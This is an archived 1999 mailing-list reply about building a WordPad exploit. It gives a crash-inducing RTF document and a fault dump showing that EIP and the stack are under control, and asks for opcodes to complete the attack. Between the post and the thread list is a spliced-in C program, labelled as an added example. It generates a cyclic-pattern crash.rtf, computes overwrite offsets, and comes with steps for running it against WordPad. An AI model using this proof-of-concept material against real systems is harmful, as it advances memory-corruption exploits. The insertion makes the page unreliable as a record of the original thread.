Vulnerability Development mailing list archives
Re: development of wordpad exploit
From: jepaulson () BANENG COM (Jason Paulson)
Date: Fri, 19 Nov 1999 10:56:29 -0600
I am also interested in learning, and I have a small donation to make. I don't know the opcodes for an Intel processor, but I have control of the stack. So if some assembly guru will fill in the empty space with some interesting opcodes, I think we are in business.

The following contents of an RTF document (probably wrapped, should all be one line):

{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNOPQRSTUVWXYZ0AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZAAAAABBBBBCCCCCDDDDDEEEEEFFFFFGGGGGHHHHHIIIIIJJJJJKKKKKLLLLLMMMMMNNNNNOOOOOPPPPPQQQQQRRRRRSSSSSTTTTTUUUUUVVVVVWWWWWXXXXXYYYYYZZZZZ}

will cause the following dump:

WORDPAD caused an invalid page fault in module <unknown> at 00de:41414141.
Registers:
EAX=00000102 CS=017f EIP=41414141 EFLGS=00010212
EBX=0056e364 SS=0187 ESP=0056e324 EBP=00000409
ECX=0056e364 DS=0187 ESI=0056e364 FS=57a7
EDX=fffffff3 ES=0187 EDI=0056e418 GS=609e
Bytes at CS:EIP:
Stack dump:
44434241 48474645 4c4b4a49 504f4e4d 54535251 58575655 00005a59 00500f1c 00000000 00000000 00000000 00500e90 480268ad 00500f40 00500e90 80000002

Notice that we control EIP (41414141, all As) and the first part of the stack is also under our control (44434241 48474645 = DCBA HGFE). This is reversed because of the way the i386 architecture stores memory pointers.

Cheers,
Jason
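The crash document above uses runs of repeated letters, so a register value such as 41414141 cannot be traced back to one position in the file. The following C program is an added example, not code from the original post or from any of the thread's participants: it generates the same `{\rtf\...}` shape with a letters-only cyclic pattern, so that whatever four bytes land in EIP (or at ESP) name a unique file offset, and it decodes a dumped register value back into the bytes that sat in memory. The pattern stays alphabetic on purpose: in RTF a control word is a run of letters ended by the first non-letter, and a digit starts a numeric parameter, so an over-long letter run keeps the parser on the same path as the post's document. The output file name `crash.rtf` and the pattern scheme are this example's own choices.

```c
/* Added example (not from the original post): a unique-pattern variant of the
 * WordPad crash document, plus helpers to map a faulting register value back
 * to an offset in the file. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Letters-only cyclic pattern "AaA AaB AaC ... AaZ AbA ...": every 4-byte
 * window is unique for the first 52728 bytes. 'out' must hold n + 1 bytes. */
size_t cyclic_pattern(char *out, size_t n) {
    size_t i = 0;
    for (char u = 'A'; u <= 'Z' && i < n; u++)
        for (char l = 'a'; l <= 'z' && i < n; l++)
            for (char m = 'A'; m <= 'Z' && i < n; m++) {
                const char trip[3] = { u, l, m };
                for (int k = 0; k < 3 && i < n; k++)
                    out[i++] = trip[k];
            }
    out[i] = '\0';
    return i;
}

/* Wrap the pattern as one over-long control word, the shape of the post's
 * document: {\rtf\<pattern>}. Returns the length written, or -1 on overflow. */
int rtf_crash_doc(char *out, size_t cap, const char *pattern) {
    int n = snprintf(out, cap, "{\\rtf\\%s}", pattern);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* Turn a value as printed in the fault dump (e.g. 44434241) back into the
 * bytes that were in memory ("ABCD"): x86 is little-endian, so the lowest
 * address holds the low byte. 'out' must hold 5 bytes. */
void dword_to_bytes(uint32_t v, char out[5]) {
    for (int i = 0; i < 4; i++)
        out[i] = (char)((v >> (8 * i)) & 0xff);
    out[4] = '\0';
}

/* Offset in the pattern whose four bytes would show up as register value
 * 'reg'. Returns -1 if absent and -2 if ambiguous, which is what happens
 * with 41414141 against an all-A run like the one in the post. */
long pattern_offset(const char *pat, size_t len, uint32_t reg) {
    char needle[5];
    long found = -1;
    dword_to_bytes(reg, needle);
    for (size_t i = 0; i + 4 <= len; i++) {
        if (memcmp(pat + i, needle, 4) == 0) {
            if (found >= 0)
                return -2;
            found = (long)i;
        }
    }
    return found;
}

int main(void) {
    char pat[2001], doc[2100], bytes[5];
    size_t len = cyclic_pattern(pat, 2000);

    if (rtf_crash_doc(doc, sizeof doc, pat) < 0)
        return 1;
    FILE *f = fopen("crash.rtf", "wb");   /* file name is this example's choice */
    if (!f)
        return 1;
    fputs(doc, f);
    fclose(f);

    /* The post's first stack dword, decoded the way it sat in memory. */
    dword_to_bytes(0x44434241u, bytes);
    printf("stack dword 44434241 = \"%s\"\n", bytes);

    /* With the unique pattern, a register value names its own offset. */
    printf("0x61414361 sits at pattern offset %ld\n",
           pattern_offset(pat, len, 0x61414361u));
    printf("41414141 in an all-A run: %ld (ambiguous)\n",
           pattern_offset("AAAAAAAA", 8, 0x41414141u));
    return 0;
}
```

Run the program, open `crash.rtf` in WordPad, and read EIP and the first stack dwords from the fault dialog; feeding each value to `pattern_offset` gives the byte in the file that overwrote the saved return address and the bytes that sit at ESP afterwards, which is the information needed before any opcodes can be placed.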
Current thread:
- development of wordpad exploit Linux Users Strike Today (Nov 18)
- RES: development of wordpad exploit Marlon Jabbur (Nov 19)
- Re: development of wordpad exploit Gerardo Richarte (Nov 19)
- Re: development of wordpad exploit Gerardo Richarte (Nov 19)
- <Possible follow-ups>
- Re: development of wordpad exploit Larry W. Cashdollar (Nov 19)
- Re: development of wordpad exploit Taneli Huuskonen (Nov 19)
- Re: development of wordpad exploit Jason Paulson (Nov 19)
- Re: development of wordpad exploit Riley, Steven (Nov 19)
- Re: development of wordpad exploit Thomas Dullien (Nov 19)
- Re: development of wordpad exploit Harlan Carvey (Nov 19)
- Re: development of wordpad exploit Vanna P. Rella (Nov 19)
- Re: development of wordpad exploit Witold Chrabaszcz (Nov 19)
- Re: development of wordpad exploit Blue Boar (Nov 19)
- Re: development of wordpad exploit Rodrick Brown (Nov 19)
- [Fwd: INZIDER!] Blue Boar (Nov 19)
- Re: development of wordpad exploit Seth R Arnold (Nov 20)
- Re: development of wordpad exploit Witold Chrabaszcz (Nov 19)
- Re: development of wordpad exploit Aubrey Smith (Nov 20)